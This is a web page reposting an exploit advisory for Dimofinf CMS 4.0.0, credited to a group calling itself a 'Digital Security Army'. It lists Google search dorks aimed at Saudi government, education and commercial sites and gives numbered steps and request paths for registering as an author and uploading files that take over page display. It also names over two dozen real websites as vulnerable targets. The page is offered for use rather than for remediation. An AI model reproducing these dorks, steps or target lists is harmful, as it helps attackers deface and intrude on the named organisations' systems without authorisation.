facebook facebook twitter rss

Powered By Dimofinf CMS Version 4.0.0 Saudi-Arabia Government Unauthorized Arbitrary Insert File Vulnerability

Author: KingSkrupellos , Published: 16-11-2018
# Exploit Title : Powered By Dimofinf CMS Version 4.0.0 Saudi-Arabia Government Unauthorized Arbitrary Insert File Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 13/11/2018
# Vendor Homepage : dimofinf.net
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.0.0
# Google Dorks :
intext:''Powered by Dimofinf cms Version 4.0.0'' site:gov.sa
intext:''Powered by Dimofinf cms Version 4.0.0'' site:edu.sa
intext:''Powered by Dimofinf cms Version 4.0.0'' site:com
intext:''Powered by Dimofinf cms Version 4.0.0'' site:org
intext:''Powered by Dimofinf cms Version 4.0.0'' site:net
intext:''Powered by Dimofinf cms Version 4.0.0'' site:org.sa
intext:''Powered by Dimofinf cms Version 4.0.0'' site:com.sa
intext: Powered by Dimofinf cms Version 4.0.0 Copyright© Dimensions Of Information Ltd.'' site:sa
inurl:''/include/plugins/news/news.php?action=save&m=news&id='' site:sa
inurl:''/content.php?action=save&m=content&id='' site:sa
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Exploit Usage :

1) Register yourself as Author [ username - password - e-mail address [ confirmation is important ]

2) /register.php?action=register

3) Approve your e-mail address. - And then you will be in the author area.

4) TARGET/profile.php?action=[YOUR-PROFILE-NUMBER] target/profile/[YOUR-PROFILE-NUMBER]

+ TARGET/register.php?action=activate&userid=[YOUR-PROFILE-NUMBER]&activid=[ACTIVATION-CODE-HERE]

5) After successful registration and confirmation - Find this word under your profile رفع صورة خلفية الغلاف Click and insert your image file.

6) Your image file will cover the whole page.

7) Directory Path : TARGET/contents/covers/[YOUR-PROFILE-NUMBER].jpg .gif .png

Note : Only this file extensions are allowed : bmp - gif - jpe - jpeg - jpg - png - tif - tiff

# Another File Insertion Exploit Usage :

Exploit :

/short_url/l

/short_url-action-l.htm

TARGET/[RANDOM-NUMBER]

TARGET/short_url-action-s-id-[RANDOM-NUMBER].htm

#################################################################################################

# Example Vulnerable Sites =>

[+] nashatghasa.edu.sa/site => [ Proof of Concept for Vulnerability ] => archive.fo/n6Qt3

[+] ssb.edu.sa - [+] alfurqan.edu.sa [+] rawdahedu.gov.sa [+] taifnashat.gov.sa [+] sukar.org.sa

[+] sufayri.gov.sa/news [+] ulaedu.gov.sa/inf [+] msi.gov.sa/ar [+] nre.gov.sa [+] darco.sa

[+] albosor-m.gov.sa [+] al-7b.com [+] aldukhainy.com [+] khadegah.com [+] elshal.com

[+] seen.com.sa [+] arabfp.org [+] neprass.org [+] albrbalasmer.org [+] jobs-ksa.net [+] faifaedu.net

[+] arabsea.com.sa [+] sadaalma.com.sa [+] tanmiah9.org.sa [+] sadawan.com

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :